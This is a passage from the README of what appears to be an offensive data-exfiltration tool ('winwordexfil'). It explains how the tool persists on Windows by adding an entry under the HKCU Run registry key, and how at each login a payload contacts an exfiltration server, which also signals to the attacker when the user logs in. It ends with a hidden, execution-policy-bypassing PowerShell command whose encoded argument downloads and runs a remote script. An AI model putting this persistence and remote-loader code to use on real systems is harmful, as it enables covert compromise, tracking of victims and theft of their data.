ramirezversion/winwordexfil/README.md

 The persistence in the execution of this software is implemented by adding an entry in the registry path: `HKCU\Software\Microsoft\Windows\CurrentVersion\Run` which is executed each time the user log in.

 This payload makes a GET request to the server to load the software into memory and executes it.
+With this implementation the attacker can know when the user is logged into the computer because a GET request always will be do to the exfiltration server during user login.

 ```
 powershell.exe -NoProfile -Noninteractive -ExecutionPolicy Bypass -WindowStyle Hidden -enc aQBlAHgAIAAoAGkAdwByACAAJwBoAHQAdABwADoALwAvADEAOQAyAC4AMQA2ADgALgA1ADYALgAxADoAOAAwADgAMAAvAG0AYQBpAG4ALgBwAHMAMQAnACkA